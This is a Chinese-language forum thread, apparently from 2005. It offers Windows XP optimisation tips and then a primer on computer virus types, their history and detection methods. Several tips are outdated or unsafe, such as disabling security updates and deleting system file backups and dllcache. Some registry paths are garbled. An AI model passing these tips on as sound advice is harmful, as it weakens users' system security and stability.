Windows XP和Windows 2000一样可以作为诸如Http服务器、邮件服务器、FTP服务器,所以每当Windows XP启动时,随之也启动了许多服务,有很多服务对于我们这些普通用户来说是完全没用的,所以关掉它们是一个很好的选择。操作的方法是:右键单击“我的电脑”,依次选择“管理/服务和应用程序/服务”,将不需要的服务组件禁用。
注意:有些服务是Windows XP必需的,关闭后会造系统崩溃。查看详细说明确认后再禁止。
编者注:对于Windows XP常见的90个服务,本文将有专门章节分析。

减少启动时加载项目
许多应用程序在安装时都会自作主张添加至系统启动组,每次启动系统都会自动运行,这不仅延长了启动时间,而且启动完成后系统资源已经被吃掉不少!我们可以减少系统启动时加载的程序,方法是:选择“开始”菜单的“运行”,键入“msconfig”启动“系统配置实用程序”,进入“启动”标签,在此窗口列出了系统启动时加载的项目及来源,仔细查看你是否需要它自动加载,否则清除项目前的复选框,加载的项目愈少,启动的速度自然愈快。此项需要重新启动方能生效。

关闭系统还原功能
“系统还原”功能是Windows系列操作系统的一个重要特色,当Windows运行出现问题后,还原操作系统。“系统还原”虽然对经常犯错误的人有用,但是它会让你的硬盘处于高度繁忙的状态,你会发现你的硬盘总是忙个不停,因为Windows XP要记录操作,以便日后还原。如果你对自己有信心,那么就不要使用它,因为它可占不少内存。
关闭系统还原功能方法是:单击“开始/所有程序/附件/系统工具/系统还原”,在系统还原界面,单击“系统还原设置”进入“系统还原设置”窗口,清空“在所有驱动器上关闭系统还原”复选框,这样Windows XP就会删除备份的系统还原点,从而释放它占用的磁盘空间。
一般来说,为了兼顾系统性能和系统安全,笔者建议打开Windows XP所在盘符的系统还原功能。

关闭自动更新
“自动更新”是Windows XP为了方便用户升级系统而推出的一种新功能,这种功能可以在微软推出系统升级补丁或系统安全补丁的时候,自动提醒用户升级自己的系统,不过这种功能有一个要求,就是用户必须时时在线,但是对于我们这些缺铁少银的“穷人”来说,这个要求未免苛刻,所以我们把“自动升级”功能关闭掉,改为“手动升级”。
关闭自动更新具体操作为:右键单击“我的电脑/属性/自动更新”,在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。 

关闭远程桌面
这个功能的一个特点就是可以让别人在另一台机器上访问你的桌面。在局域网中,这个功能很有用。比如你有问题了可以向同事求助,他可以不用到你的跟前,直接通过“远程桌面”来访问你的机器帮你解决问题。但是对于我们只有一台计算机的 普通用户来说这个功能就显得多余了,所以我们把它关掉,不让它在那儿白白浪费内存。具体操作为:右键单击“我的电脑”,选择“属性/远程”,把“远程桌面”里的“允许用户远程连接到这台计算机”勾去掉。

禁用消休眠功能
Windows XP的休眠可以把内存中当前的系统状态完全保存到硬盘,当你下次开机的时候,系统就不需要经过加载、系统初始化等过程,而直接转到你上次休眠时的状态,因此启动非常快。但它会占用大量的硬盘空间(和你的内存大小一样),可以到“控制面板/电源选项/休眠”中将其关闭,以释放出硬盘空间,待到要需要使用时再打开即可。方法是:单击“开始/控制面板/电源管理/休眠”,将“启用休眠”前的勾去掉。

关闭“自动发送错误报告”功能
大家在Window XP 中肯定有这样的经历,一旦一个程序异常终止,系统就会自动跳出一个对话框问你是否将错误发送给微软,这就是XP中的“自动发送错误”功能,它可以将错误信息发送到微软的网站。虽然微软一再信誓旦旦地表示,可以提供强大的安全保障,不会泄露个人隐私,但是发送给微软的信息中有可能包含你正在浏览或编辑的文档信息,也许这正包含了个人隐私或是公司机密,因此如果你想保障自己应有的权利,我们应该义无反顾的把这项功能关掉。方法是:单击“开始/控制面板/系统/高级”,单击“错误报告”按钮,然后选中“禁用错误报告”,下面的“但在发生严重错误时通知我”可以选中。

关闭“Internet时间同步”功能
“Internet时间同步”就是使你的计算机时钟每周和Internet时间服务器进行一次同步,这样你的系统时间就会是精确的,不过这个功能对我们来说用处不大,而且还可能引起死机的问题。一般来说,只要在安装完Windows XP以后同步一次时间就可以了。所以我们要把它关掉。具体操作是:依次单击“开始/控制面板/日期、时间、语言和区域选项”,然后单击“日期和时间/Internet时间”。


合理设置虚拟内存
对于虚拟内存文件,Windows XP为了安全默认值总是设的很大,浪费了不少的硬盘空间,其实我们完全可以将它的值设小一点。方法是:进入“控制面板/系统/高级/性能/设置/高级/虚拟内存/更改”,来到虚拟内存设置窗口,首先确定你的页面文件在哪个驱动器盘符,然后将别的盘符驱动器的页面文件全部禁用。建议你把它是设置到其他分区上,而不是默认的系统所在的分区,这样可以提高页面文件的读写速度,有利于系统的快速运行。根据微软的建议,页面文件应设为内存容量的1.5倍,但如果你的内存比较大,那它占用的空间也是很可观的,所以,建议如果内存容量在256MB以下,就设置为1.5倍,最大值和最小值一样,如果在512MB以上,设置为内存容量的一半完全可行。

删除多余文档
Windows XP中有许多文件平时我们很少用到,放在硬盘中,白白浪费空间,降低系统性能。我们完全可以把这些用不到的文件删除,需要删除的文件有:
帮助文件:在C:WindowsHelp目录下。
驱动备份:C:Windowsdriver cachei386目录下的Driver.cab文件。
系统文件备份: 一般用户是不怎么用的,利用命令sfc.exe /purgecache删除。
备用的dll文件:在C:Windowssystem32dllcache目录下。
输入法:在C:WindowsIme文件夹下直接删除chtime、imjp8_1、imkr6_1三个目录即可,分别是繁体中文、日文、韩文输入法。

删除WindowsXP中隐含的组件
Windows XP在正常安装之后,会自动安装许多组件,这些组件有许多是平时用不到的,安装在系统中会占用很多空间,降低系统性能,我们可以用下述方法删除不用的组件。
用记事本修改C:WindowsInf目录下的Sysoc.inf文件,用查找/替换功能,在查找框中输入“,hide”(一个英文逗号紧跟hide),将“替换为”框设为空。并选全部替换,这样,就把所有的“,hide”都去掉了,存盘退出,再单击“开始/控制面板/添加或删除程序”,就可以看到许多平时见不到的组件,选择不需要程序进行删除即可。

清理垃圾文件
Windows XP在正常的使用过程中会产生扩展名为TMP、BAK、OLD之类的垃圾文件,你可以用Windows的搜索功能,查出这些文件,然后把它们删除。另外Windows XP默认会在系统失败时记录错误事件,并写入调试信息,这些文件信息我们完全可以弃之不用。方法是单击“开始/控制面板/系统/高级/启动和故障恢复”,清空“将事件写入日志文件”,在“写入调试信息”下拉框里选“无”即可。


禁止MSN随Windows启动
每次启动Windows时,Messenger总是自动运行,即使你不想启动它,可是它也自动运行,非常烦人,我们能不能禁止它,不让它随Windows启动呢?回答是可以的。
第一种方法:
1.在“开始”菜单中单击“运行”,在“打开”框中输入“msconfig”,“确定”后打开“系统配置实用程序”窗口。
2.单击“启动”选项卡,在“启动项目”列表中,清除“MSMSGS”前的复选框,单击“确定”按钮。
3.当系统提示“重新启动计算机”时,请单击“是”按钮。
第二种方法:
1.打开“注册表编辑器”窗口。
2.依次展开“KEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”分支,然后在右窗格中右键单击“MSMSGS”,再单击快捷菜单中的“删除”命令,当系统提示确认删除时,请单击“是”按钮。
经过设置,MSN就再也不会随Windows XP的启动而启动了。

优化带宽
Windows XP专业版新增了QoSRRP(这是Quality of Service Resource Reservation Protocol的缩写,意为服务质量资源预留协议)。一般来说,试图通过可用带宽访问信息的时候,应用程序要么通过QoS应用程序接口,要么通过另一个称为TCI的应用程序接口。在网络通讯上,为了商业方面的安全性保留了一定的频宽给了管理者,这对于QoS应用程序来说无疑是件好事,但是一般使用者便不需要此功能,无形中就有部分(默认为20%)带宽白白浪费了,因此我在此提供取消此功能的方法。
选择“开始”菜单,点击“注销”,进到登录的主画面,在登录的主画面中按下Ctrl+Alt+Del两次出现了登录窗口,在使用者名称中输入Administrator(注:要区分大小),密码栏中填入自设密码(若没有设定密码者空白即可)按确定进入Windows,单击“开始/运行”输入gpedit.msc进入到“组策略”窗口,在左边窗口中选取“计算机配置/管理模板/网络/QoS数据包调度程序”,在右边的窗口中双击“限制可保留的带宽”,选择“已启用”并将“带宽限制(%)”设为0,单击“应用”,然后“确定”,重新启动即可。
注意:Windows XP家庭版的使用者不必更改这些设置。

删除多余字体
Windows XP中安装的字体越多,就会占用更多的内存的系统资源,减慢系统的运行速度,因此,对于不常用的字体,我们最好把它从系统中删除。字体文件存放在C:Windowsfont目录下,你完全可以根据需要选择一些字体,对于更多不用的字体,一删了之。

更改IE临时文件夹
上网时产生的大量临时文件都存放在IE临时文件夹中,默认情况下,临时文件夹是在系统分区上,大量的临时文件会影响硬盘读写系统文件的性能。你可以更改临时文件的位置来避免出现这种情况。方法是单击“开始/控制面板/Internet选项”,在“常规”选项卡中单击“设置”按钮,在打开的窗口中单击“移动文件夹”按钮,指定一个非系统分区上的文件夹,单击“确定”后,临时文件就会移到指定的文件夹上。

加快“网上邻居”共享的速度
不知道各位使用者用Windows XP开“网上邻居”里面的共享资源时,有没有发现所花的时间相当的长,这是因为它会检查其它计算机中的设定工作,有时甚至就在那边停了将近一分钟,相当讨厌,大家可以通过下面的方法将其检查的步骤取消:选择“开始/运行”,输入regedit,在弹出注册表编辑器中寻找[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/
Explorer/RemoteComputer/NameSpace],按鼠标右将在此位置的{D6277990-4C6A-11CF-8D87-00AA0060F5BF}删除之即可。

清除预读文件
当Windows XP使用一段时间后,安装目录下的预读文件夹(C:Windowsprefetch)里的文件会变的很大,里面会有死链接文件,这会减慢系统时间,建议你定期删除这些文件。

设置预读以提高速度
Windows XP使用预读设置这一新技术,以提高系统速度。如果你的电脑配置不错,拥有PIII 800, 512M内存以上,你可以进行以下修改:单击“开始/运行”,输入“regedit”,打开注册表,找到[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementPrefetchParametersEnablePrefetcher],设置数值0,1,2,3(0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读),推荐使用“3”,这样可以减少启动时间。

取消不需要的网络服务组件
单击“开始/控制面板/网络连接/本地连接”打开本地连接状态窗口,单击“属性”按钮,打开属性对话框,单击“高级”选项卡,选中“通过限制或阻止来自Internet的对此计算机的访问来保护我的计算机和网络”选项,然后单击“设置”按钮,就可以看到所有已经安装的、Internet用户可以访问的、运行于你的网络上服务,除非你想架设FTP或SMTP服务器,否则不妨全部取消这些项目的选定状态。  

启用DMA传输模式
所谓DMA,即直接存储器存储模式,指计算机周边设备(主要指硬盘)可直接与内存交换数据,这样可加快硬盘读写速度,提高速据传输速率。由于某些原因,Windows XP有时会在IDE通道上使用PIO并行输入输出传输模式,而不是DMA模式。如果有这种情况,用户可以手动把IDE通道改为DMA模式,这样可以减少该设备占用的CPU周期。方法是:右键点击“我的电脑”,选“属性”,点选“硬件”选项卡,单击“设备管理器”按钮,打开“设备管理器”,然后点击展开“IDE ATA/ATAPI 控制器”分支,其中“IDE控制器”有两项“主要IDE通道”及“次要IDE通”,分别选中,依次进入“属性/高级设置”,该对话框会列出目前IDE接口所连接设备的传输模式,检查“传输模式”下拉菜单,把它们全部设“DMA(若可用)”,点击“确定”。

加快菜单显示速度
选择“开始/运行”,输入regedit,弹出注册表编辑,寻找[HKEY_CURRENT_USERControlPanelDesktop],在右边的窗口中选择MenuShowDelay,按鼠标右键,选择“修改”,将其数值资料改为100或更小(默认值为:400),建议不要使用0,因为如此一来只要鼠标一不小心触碰到“所有程序”,整条菜单就会跑出来,那这乱了套。

加快关机速度
Windows XP的开机速度的确比以前版本的操作系统快了很多,但关机速度却慢了不少。如果你在意关机速度的快慢,可以修改几个注册表键值,就可以大大减少Windows关闭所用的时间。首先打开注册表编辑器,找到HKEY_CURRENT_USERControl PanelDesktop,里面有个名为HungAppTimeout的键,它的默认值是5000(如果不是,把它改为5000)。接下来,还有个WaitToKillAppTimeout键,把它的值改为4000(默认值是2000)。最后,找到注册表如下位置:HKEY_LOCAL_MACHINESystemCurrentControlSetControl。同样地,把其中的WaitToKillServiceTimeout键值改为4000。另外,把“控制面板/管理工具/服务”中的NVidia Driver Help服务设为手动,也可以加快Windows关闭时间。

关闭计算机时自动结束任务
在关机的时候,有时会弹出讨厌的对话框,提醒某个程序仍在运行,是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USERControl PanelDesktop 目录,把里面的AugoEndTasks键值改为1。
注意:可能会找不到AutoEndTasks键值,如果是这样的话,自己建一个串值并把它改为这个名字,值设为1就可以了。

关闭华生医生Dr.Watson
单击“开始/运行”,输入“drwtsn32”命令,或者“开始/所有程序/附件/系统工具/系统信息/工具/Dr Watson”,调出系统里的华生医生Dr.Watson ,只保留“转储全部线程上下文”选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间。

减少磁盘扫描等待时间
WindowsXP虽然号称稳定,但是并不是永不死机,偶尔也会给你个蓝脸,非法操作后系统会自动扫描,出现大段大段的E文,告诉你刚才系统非正常结束,现在需要检查一下是否出错,可是还要等待一段时间才开始,所以我们可以在dos下,键入“chkntfs/t:0”,表示等待时间为0秒。

删除多余的帐户
如果你的电脑只有你一个人使用,最好只建自己的一个帐户,因为你每建一个帐户,就会在Windows XP的安装目录下的document. and settings下面多一个以你所建帐户为名的文件夹,里面存放着这个帐户的一些资料,有收藏夹、文档、历史记录,系统设置信息等内容,天长日久它占用的空间也是不可小觑的,解决方法就是到“开始/控制面板/用户帐户”里依自己情况删除多余的帐户即可。

让系统自动关闭停止响应的程序
单击“开始/运行”,输入regedit,弹出注册表编辑器,寻找[HKEY_CURRENT_USERControlPanelDesktop],在右边的窗口中选择AutoEndTasks,按鼠标右键,选择“修改”,将其数值资料改为1(默认值为:0)。

IE网络浏览器加速技巧
Windows XP自带Internet Explorer6,有个小技巧,修改之后启动得飞快(在我的机子上,简直是瞬间启动)。具体做法是:右键点击Internet Explorer快捷图标(如任务栏上的快捷启动栏中那个IE图标),打开图标属性之后在“目标”后面加上“-nohome”参数即可。
二、文件管理和操作技巧
加密文件和文件夹
在任何需要加密的文件和文件夹上右键单击鼠标,选择“属性”命令,单击“常规”选项卡,然后依次选择“高级加密内容以便保护数据”后确定就可以了。需要说明是 :Windows XP的加密操作只针对NTFS格式的磁盘分区,它对传统的FAT16和FAT32格式的分区不提供加密支持,如果你想使用加密操作,就需要把磁盘转换为NTFS格式。

自定义文件夹图片
在Windows XP中新增了文件夹图片功能,它提供了比原来的图标内容更多丰富的图片资源供用户选择,你可以利用这一功能把自己喜欢的任意图片设为文件夹图标,方法是:在资源管理器选中任一文件夹,右键单击,选择“属性”命令,在打开的对话框中选择“自定义”选项卡,单击“选择图片”按钮选择作为文件夹图片的图形文件,单击“更改图标”按钮可以文件夹图标,然后单击“确定”即可,以后你在资源管理器中选择以“缩略图”形式查看文件时,就可以看到你定义的文件夹图片。

快速移动和复制文件
在资源管理器中选中你要移动或复制的文件,然后用鼠标右键将文件拖动目的文件夹后松开,会弹出一个菜单,允许你选择复制、移动文件还是创建一个快捷方式,甚至可以取消
鱼溺水而亡,是为了让大海能够记住他~
33楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:31   |  只看该作者   |  转账至  82622206

计算机病毒的故事

计算机病毒小知识速查系列一

计算机病毒的定义
计算机病毒(Computer Virus)在 《中华人民共和国计算机信息系统安全保护条例》中被明确定义为:"指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码"。

计算机病毒的特点

人为的特制程序,具有自我复制能力,很强的感染性,一定的潜伏性,特定的触发性,很大的破坏性。

病毒存在的必然性

计算机的信息需要存取,复制,传送,病毒作为信息的一种形式可以随之繁殖,感染,破坏.并且,当病毒取得控制权之后,他们会主动寻找感染目标,使自己广为流传。

计算机病毒的长期性

计算机操作系统的弱点往往是被病毒利用,提高系统的安全性是防病毒的一个重要方面,但完美的系统是不存在的。提高一定的安全性将使系统多数时间用于病毒检查,系统失去了可用性与实用性,另一方面,信息保密的要求让人在泄密和抓住病毒之间无法选择。

这样,病毒与反病毒将成为一个长期的技术对抗。病毒主要由反病毒软件来对付,而且反病毒技术将成为一种长期的科研做下去。

计算机病毒的产生

病毒不是来源于突发或偶然的原因。

突发的停电和偶然的错误,会在计算机的磁盘和内存中产生一些乱码和随机指令,但这些代码是无序和混乱的。病毒则是一种比较完美的,精巧严谨的代码,按照严格的秩序组织起来,与所在的系统网络环境相适应和配合起来,病毒不会通过偶然形成,并且需要有一定的长度,这个基本的长度从概率上来讲是不可能通过随机代码产生的。

病毒是人为的特制程序

现在流行的病毒是由人为故意编写的,多数病毒可以找到作者信息和产地信息,通过大量的资料分析统计来看,病毒作者主要情况和目的是:一些天才的程序员为了表现自己和证明自己的能力,处于对上司的不满,为了好奇,为了报复,为了祝贺和求爱,为了得到控制口令,为了软件拿不到报酬预留的陷阱等。当然也有因政治,军事,宗教,民族。专利等方面的需求而专门编写的,其中也包括一些病毒研究机构和黑客的测试病毒。

计算机病毒小知识速查系列二

   >  
计算机病毒分类

根据多年对计算机病毒的研究,按照科学的,系统的,严密的方法,计算机病毒可分类如下:
按照计算机病毒属性的分类

1、病毒存在的媒体

根据病毒存在的媒体,病毒可以划分为网络病毒,文件病毒,引导型病毒。
网络病毒通过计算机网络传播感染网络中的可执行文件,文件病毒感染计算机中的文件(如:COM,EXE,DOC等),引导型病毒感染启动扇区(Boot)和硬盘的系统引导扇区(MBR),还有这三种情况的混合型,例如:多型病毒(文件和引导型)感染文件和引导扇区两种目标,这样的病毒通常都具有复杂的算法,它们使用非常规的办法侵入系统,同时使用了加密和变形算法。

2、病毒传染的方法

3、病毒破坏的能力

根据病毒破坏的能力可划分为以下几种:
无害型:除了传染时减少磁盘的可用空间外,对系统没有其它影响。
无危险型:这类病毒仅仅是减少内存、显示图像、发出声音及同类音响。
危险型:这类病毒在计算机系统操作中造成严重的错误。
非常危险型:这类病毒删除程序、破坏数据、清除系统内存区和操作系统中重要的信息。
这些病毒对系统造成的危害,并不是本身的算法中存在危险的调用,而是当它们传染时会引起无法预料的和灾难性的破坏。由病毒引起其它的程序产生的错误也会破坏文件和扇区,这些病毒也按照他们引起的破坏能力划分。一些现在的无害型病毒也可能会对新版的DOS、Windows和其它操作系统造成破坏。例如:在早期的病毒中,有一个"Denzuk"病毒在360K磁盘上很好的工作,不会造成任何破坏,但是在后来的高密度软盘上却能引起大量的数据丢失。

4、病毒特有的算法

根据病毒特有的算法,病毒可以划分为:
伴随型病毒:这一类病毒并不改变文件本身,它们根据算法产生EXE文件的伴随体,具有同样的名字和不同的扩展名(COM),例如:XCOPY.EXE的伴随体是XCOPY.COM。病毒把自身写入COM文件并不改变EXE文件,当DOS加载文件时,伴随体优先被执行到,再由伴随体加载执行原来的EXE文件。
"蠕虫"型病毒:通过计算机网络传播,不改变文件和资料信息,利用网络从一台机器的内存传播到其它机器的内存,计算网络地址,将自身的病毒通过网络发送。有时它们在系统存在,一般除了内存不占用其它资源。
寄生型病毒:除了伴随和"蠕虫"型,其它病毒均可称为寄生型病毒,它们依附在系统的引导扇区或文件中,通过系统的功能进行传播,按算法分为:
练习型病毒:病毒自身包含错误,不能进行很好的传播,例如一些病毒在调试阶段。
诡秘型病毒:它们一般不直接修改DOS中断和扇区数据,而是通过设备技术和文件缓冲区等DOS内部修改,不易看到资源,使用比较高级的技术。利用DOS空闲的数据区进行工作。
变型病毒(又称幽灵病毒):这一类病毒使用一个复杂的算法,使自己每传播一份都具有不同的内容和长度。它们一般的作法是一段混有无关指令的解码算法和被变化过的病毒体组成。


计算机病毒小知识速查系列三

   >  
计算机病毒的发展

在病毒的发展史上,病毒的出现是有规律的,一般情况下一种新的病毒技术出现后,病毒迅速发展,接着反病毒技术的发展会抑制其流传。操作系统进行升级时,病毒也会调整为新的方式,产生新的病毒技术。它可划分为:

1、DOS引导阶段
1987年,计算机病毒主要是引导型病毒,具有代表性的是"小球"和"石头"病毒。
当时得计算机硬件较少,功能简单,一般需要通过软盘启动后使用。引导型病毒利用软盘得启动原理工作,它们修改系统启动扇区,在计算机启动时首先取得控制权,减少系统内存,修改磁盘读写中断,影响系统工作效率,在系统存取磁盘时进行传播。1989年,引导型病毒发展为可以感染硬盘,典型的代表有"石头2"。

2、DOS可执行阶段
1989年,可执行文件型病毒出现,它们利用DOS系统加载执行文件的机制工作,代表为"耶路撒冷","星期天"病毒,病毒代码在系统执行文件时取得控制权,修改DOS中断,在系统调用时进行传染,并将自己附加在可执行文件中,使文件长度增加。1990年,发展为复合型病毒,可感染COM和EXE文件。

3、伴随、批次型阶段
1992年,伴随型病毒出现,它们利用DOS加载文件的优先顺序进行工作。具有代表性的是"金蝉"病毒,它感染EXE文件时生成一个和EXE同名的扩展名为COM伴随体;它感染COM文件时,改为原来的COM文件为同名的EXE文件,在产生一个原名的伴随体,文件扩展名为COM。这样,在DOS加载文件时,病毒就取得控制权。这类病毒的特点是不改变原来的文件内容,日期及属性,解除病毒时只要将其伴随体删除即可。在非DOS操作系统中,一些伴随型病毒利用操作系统的描述语言进行工作,具有典型代表的是"海盗旗"病毒,它在得到执行时,询问用户名称和口令,然后返回一个出错信息,将自身删除。批次型病毒是工作在DOS下的和"海盗旗"病毒类似的一类病毒。

4、幽灵、多形阶段
1994年,随着汇编语言的发展,实现同一功能可以用不同的方式进行完成,这些方式的组合使一段看似随机的代码产生相同的运算结果。幽灵病毒就是利用这个特点,每感染一次就产生不同的代码。例如"一半"病毒就是产生一段有上亿种可能的解码运算程序,病毒体被隐藏在解码前的数据中,查解这类病毒就必须能对这段数据进行解码,加大了查毒的难度。多形型病毒是一种综合性病毒,它既能感染引导区又能感染程序区,多数具有解码算法,一种病毒往往要两段以上的子程序方能解除。

5、生成器、变体机阶段
1995年,在汇编语言中,一些数据的运算放在不同的通用寄存器中,可运算出同样的结果,随机的插入一些空操作和无关指令,也不影响运算的结果,这样,一段解码算法就可以由生成器生成。当生成的是病毒时,这种复杂的称之为病毒生成器和变体机就产生了。具有典型代表的是"病毒制造机"VCL,它可以在瞬间制造出成千上万种不同的病毒,查解时就不能使用传统的特征识别法,需要在宏观上分析指令,解码后查解病毒。变体机就是增加解码复杂程度的指令生成机制。

6、网络、蠕虫阶段
1995年,随着网络的普及,病毒开始利用网络进行传播,它们只是以上几代病毒的改进。在非DOS操作系统中,"蠕虫"是典型的代表,它不占用除内存以外的任何资源,不修改磁盘文件,利用网络功能搜索网络地址,将自身向下一地址进行传播,有时也在网络服务器和启动文件中存在。

7、视窗阶段
1996年,随着Windows和Windows95的日益普及,利用Windows进行工作的病毒开始发展,它们修改(NE,PE)文件,典型的代表是DS.3873,这类病毒的急智更为复杂,它们利用保护模式和API调用接口工作,解除方法也比较复杂。

8、宏病毒阶段
1996年,随着Windows Word功能的增强,使用Word宏语言也可以编制病毒,这种病毒使用类Basic语言,编写容易,感染Word文档文件。在Excel和AmiPro出现的相同工作机制的病毒也归为此类。由于Word文档格式没有公开,这类病毒查解比较困难。

9、互连网阶段
1997年,随着因特网的发展,各种病毒也开始利用因特网进行传播,一些携带病毒的数据包和邮件越来越多,如果不小心打开了这些邮件,机器就有可能中毒。

10 Java、邮件炸弹阶段
1997年,随着万维网上Java的普及,利用Java语言进行传播和资料获取的病毒开始出现,典型的代表是JavaSnake病毒。还有一些利用邮件服务器进行传播和破坏的病毒,例如Mail-Bomb病毒,它就严重影响因特网的效率。

计算机病毒小知识速查系列四

计算机病毒的危害性

1988年11月2日下午5时1分59秒,美国康奈尔大学的计算机科学系研究生,23岁的莫里斯(Morris)将其编写的蠕虫程序输入计算机网络。在几小时内导致因特网堵塞。这个网络连接着大学、研究机关的155000台计算机,使网络堵塞,运行迟缓。这件事就像是计算机界的一次大地震,引起了巨大反响,震惊全世界,引起了人们对计算机病毒的恐慌,也使更多的计算机专家重视和致力于计算机病毒研究。1988年下半年,我国在统计局系统首次发现了"小球"病毒,它对统计系统影响极大。最近的CIH病毒,美丽杀病毒等等都在全世界范围内造成了很大的经济和社会损失。

可以看到,随着计算机和因特网的日益普及,计算机病毒和崩溃,重要数据遭到破坏和丢失,会造成社会财富的巨大浪费,甚至会造成全人类的灾难。

国内外防毒行业发展

随着计算机技术发展得越来越快,使得计算机病毒技术与计算机反病毒技术的对抗也越来越尖锐。据统计,现在基本上每天都要出现几十种新病毒,其中很多病毒的破坏性都非常大,稍有不慎,就会给计算机用户造成严重后果。下面我们以介绍国内防毒行业的发展为主。

我国计算机反病毒技术的研究和发展,是从研制防病毒卡开始的。防病毒卡的核心实际上是一个软件,只不过将其固化在ROM中。它的出发点是想以不变应万变,通过动态驻留内存来监视计算机的运行情况,根据总结出来的病毒行为规则和经验来判断是否有病毒活动,通过截获中断控制权规则和经验来判定是否有病毒活动,并可以截获中断控制权来使内存中的病毒瘫痪,使其失去传染别的文件和破坏信息资料的能力,这就是防病毒卡"带毒运行"功能的基本原理。防病毒卡主要的不足是与正常软件特别是国产的软件有不兼容的现象,误报、漏报病毒现象时有发生,降低了计算机运行速度,升级困难等。从防病毒技术上说是不成熟的,病毒知变万化,技术手段越来越高,企图以一种不变的技术对付病毒是不可能的。防病毒卡的动态监测技术、病毒行为规则的研究,对于发现计算机病毒起了很大的作用,这些技术是防病毒卡换精华。但是作为一个产品,只有这部分技术是远远不够的,这部分技术也没有太大的实际意义,所以防病毒卡的使用者在减少。

随着防病毒卡的衰落,解病毒软件则日益风行。解病毒软件最重要的功能是将病毒彻底干净地予以清除,如果说防病毒卡是治标的话,那么解病毒软件则是治本。

第一代反病毒技术是采取单纯的病毒特征判断,将病毒从带毒文件中清除掉。这种方式可以准确地清除病毒,可靠性很高。后来病毒技术发展了,特别是加密和变形技术的运用,使得这种简单的静态扫描方式失去了作用。随之而来的反病毒技术也发展了一步。

第二代反病毒技术是采用静态广谱特征扫描方法检测病毒,这种方式可以更多地检测出变形病毒,但另一方面误报率也提高,尤其是用这种不严格的特征判定方式去清除病毒带来的风险性很大,容易造成文件和数据的破坏。所以说静态防病毒技术也有难以克服的缺陷。

第三代反病毒技术的主要特点是将静态扫描技术和动态仿真跟踪技术结合起来,将查找病毒和清除病毒合二为一,形成一个整体解决方案,能够全面实现防、查、消等反病毒所必备的各种手段,以驻留内存方式防止病毒的入侵,凡是检测到的病毒都能清除,不会破坏文件和数据。随着病毒数量的增加和新型病毒技术的发展,静态扫描技术将会使查毒软件速度降低,驻留内存防毒模块容易产生误报。

第四代反病毒技术则是针对计算机病毒的发展而基于病毒家族体系的命名规则、基于多位CRC校验和扫描机理,启发式智能代码分析模块、动态数据还原模块(能查出隐蔽性极强的压缩加密文件中的病毒)、内存解毒模块、自身免疫模块等先进的解毒技术,较好的解决了以前防毒技术顾此失彼、此消彼长的状态。

计算机病毒小知识速查系列五

病毒检测的方法

在与病毒的对抗中,及早发现病毒很重要。早发现,早处置,可以减少损失。检测病毒方法有:特征代码法、校验和法、行为监测法、软件模拟法, 这些方法依据的原理不同,实现时所需开销不同,检测范围不同,各有所长。

特征代码法
特征代码法被早期应用于SCAN、CPAV等著名病毒检测工具中。国外专家认为特征代码法是检测已知病毒的最简单、开销最小的方法。

特征代码法的实现步骤如下:
采集已知病毒样本,病毒如果既感染COM文件,又感染EXE文件,对这种病毒要同时采集COM型病毒样本和EXE型病毒样本。
在病毒样本中,抽取特征代码。依据如下原则:
抽取的代码比较特殊,不大可能与普通正常程序代码吻合。抽取的代码要有适当长度,一方面维持特征代码的唯一性,另一方面又不要有太大的空间与时间的开销。如果一种病毒的特征代码增长一字节,要检测3000种病毒,增加的空间就是3000字节。在保持唯一性的前提下,尽量使特征代码长度短些,以减少空间与时间开销。
在既感染COM文件又感染EXE文件的病毒样本中,要抽取两种样本共有的代码。将特征代码纳入病毒数据库。
打开被检测文件,在文件中搜索,检查文件中是否含有病毒数据库中的病毒特征代码。如果发现病毒特征代码,由于特征代码与病毒一一对应,便可以断定,被查文件中患有何种病毒。
采用病毒特征代码法的检测工具,面对不断出现的新病毒,必须不断更新版本,否则检测工具便会老化,逐渐失去实用价值。病毒特征代码法对从未见过的新病毒,自然无法知道其特征代码,因而无法去检测这些新病毒。

特征代码法的优点是:检测准确快速、可识别病毒的名称、误报警率低、依据检测结果,可做解毒处理。其缺点是:不能检测未知病毒、搜集已知病毒的特征代码,费用开销大、在网络上效率低(在网络服务器上,因长时间检索会使整个网络性能变坏)。
其特点:
A.速度慢。随着病毒种类的增多,检索时间变长。如果检索5000种病毒,必须对5000个病毒特征代码逐一检查。如果病毒种数再增加,检病毒的时间开销就变得十分可观。此类工具检测的高速性,将变得日益困难。
B.误报警率低。
非C.不能检查多形性病毒。特征代码法是不可能检测多态性病毒的。国外专家认为多态性病毒是病毒特征代码法的索命者。
D.不能对付隐蔽性病毒。隐蔽性病毒如果先进驻内存,后运行病毒检测工具,隐蔽性病毒能先于检测工具,将被查文件中的病毒代码剥去,检测工具的确是在检查一个虚假的"好文件",而不能报警,被隐蔽性病毒所蒙骗。

校验和法
将正常文件的内容,计算其校验和,将该校验和写入文件中或写入别的文件中保存。在文件使用过程中,定期地或每次使用文件前,检查文件现在内容算出的校验和与原来保存的校验和是否一致,因而可以发现文件是否感染,这种方法叫校验和法,它既可发现已知病毒又可发现未知病毒。在SCAN和CPAV工具的后期版本中除了病毒特征代码法之外,还纳入校验和法,以提高其检测能力。
这种方法既能发现已知病毒,也能发现未知病毒,但是,它不能识别病毒类,不能报出病毒名称。由于病毒感染并非文件内容改变的唯一的非他性原因,文件内容的改变有可能是正常程序引起的,所以校验和法常常误报警。而且此种方法也会影响文件的运行速度。
病毒感染的确会引起文件内容变化,但是校验和法对文件内容的变化太敏感,又不能区分正常程序引起的变动,而频繁报警。用监视文件的校验和来检测病毒,不是最好的方法。
